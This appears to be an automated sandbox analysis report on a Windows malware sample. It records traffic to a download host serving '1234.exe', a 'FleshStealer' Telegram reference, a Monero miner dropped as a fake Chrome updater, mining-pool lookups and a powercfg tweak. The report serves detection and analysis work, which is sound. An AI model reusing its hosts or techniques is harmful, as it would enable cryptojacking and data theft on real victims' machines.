          Source: C:\Program Files\Google\Chrome\updater.exeDirectory created: C:\Program Files\Google\Libs
          Source: unknownHTTPS traffic detected: 84.32.84.151:443 -> 192.168.11.30:49775 version: TLS 1.2
          Source: zufmUwylvo.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D401BE3C FindFirstFileExW,0_2_00000125D401BE3C
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C88ABE3C FindFirstFileExW,24_2_000001F6C88ABE3C
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C890BE3C FindFirstFileExW,24_2_000001F6C890BE3C
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000261AC90BE3C FindFirstFileExW,27_2_00000261AC90BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001F02761BE3C FindFirstFileExW,28_2_000001F02761BE3C
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E40BE3C FindFirstFileExW,29_2_000002311E40BE3C

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2054247 - Severity 1 - ET MALWARE SilentCryptoMiner Agent Config Inbound : 104.20.3.235:443 -> 192.168.11.30:49779
          Source: DNS query: utka.xyz
          Source: global trafficTCP traffic: 192.168.11.30:49781 -> 89.23.100.233:3
          Source: global trafficHTTP traffic detected: GET /1234.exe HTTP/1.1Host: utka.xyzConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
          Source: unknownDNS query: name: icanhazip.com
          Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.11.30:54743 -> 1.1.1.1:53
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: global trafficHTTP traffic detected: GET /1234.exe HTTP/1.1Host: utka.xyzConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: utka.xyz
          Source: global trafficDNS traffic detected: DNS query: icanhazip.com
          Source: global trafficDNS traffic detected: DNS query: 229.116.3.0.in-addr.arpa
          Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/r1.crl0
          Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: zufmUwylvo.exe, 00000000.00000002.11912723601.00000125D3329000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.11641294350.00000216F15D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: zufmUwylvo.exe, 00000000.00000002.11840061195.00000125B8FC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.11641294350.00000216F15D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/r1.crt0
          Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE8B000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
          Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
          Source: powershell.exe, 00000015.00000002.11635417801.00000216E91F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXzu
          Source: powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAB21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.11618898711.00000216D9181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzu
          Source: powershell.exe, 00000015.00000002.11643879616.00000216F18FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
          Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: powershell.exe, 00000015.00000002.11618898711.00000216D9181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000015.00000002.11643116501.00000216F1798000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpXzu
          Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: powershell.exe, 00000015.00000002.11635417801.00000216E91F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000015.00000002.11635417801.00000216E91F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000015.00000002.11635417801.00000216E91F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF69000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACA1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD21000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD41000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD01000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAB49000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACC1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
          Source: powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXzu
          Source: powershell.exe, 00000015.00000002.11618898711.00000216DA5BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000015.00000002.11635417801.00000216E91F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE81000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BABB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/FleshStealer
          Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF69000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACA1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD21000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD41000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD01000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAB49000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACC1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
          Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF69000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACA1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD21000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD41000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD01000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAB49000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACC1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAB21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://utka.xyz
          Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAB21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://utka.xyz/1234.exe
          Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF69000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACA1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD21000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD41000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD01000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAB49000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACC1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: zufmUwylvo.exe, 00000000.00000002.11912723601.00000125D338E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownHTTPS traffic detected: 84.32.84.151:443 -> 192.168.11.30:49775 version: TLS 1.2

          Operating System Destruction

          barindex
          Source: C:\Program Files\Google\Chrome\updater.exeProcess information set: 01 00 00 00
          Source: C:\Program Files\Google\Chrome\updater.exeProcess information set: 01 00 00 00

          System Summary

          barindex
          Source: 37.2.updater.exe.140040c40.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
          Source: 37.2.updater.exe.140040c40.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: 37.2.updater.exe.140040c40.6.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: 37.2.updater.exe.14001fa80.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
          Source: 37.2.updater.exe.14001fa80.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: 37.2.updater.exe.14001fa80.7.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: 37.2.updater.exe.140062860.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
          Source: 37.2.updater.exe.140062860.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: 37.2.updater.exe.140062860.5.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: C:\Windows\Temp\jscseoeoqftm.tmp, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
          Source: C:\Windows\Temp\jscseoeoqftm.tmp, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: C:\Windows\Temp\jscseoeoqftm.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: zxcvbnmasd.exe.0.drStatic PE information: section name: .e;T
          Source: zxcvbnmasd.exe.0.drStatic PE information: section name: ."Ki
          Source: zxcvbnmasd.exe.0.drStatic PE information: section name: ..>f
          Source: updater.exe.1.drStatic PE information: section name: .e;T
          Source: updater.exe.1.drStatic PE information: section name: ."Ki
          Source: updater.exe.1.drStatic PE information: section name: ..>f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess Stats: CPU usage > 6%
          Source: C:\Windows\System32\svchost.exeProcess Stats: CPU usage > 6%
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D40130B4 GetProcessHeap,RtlAllocateHeap,NtQuerySystemInformation,StrCmpNIW,GetProcessHeap,HeapFree,RtlFreeHeap,0_2_00000125D40130B4
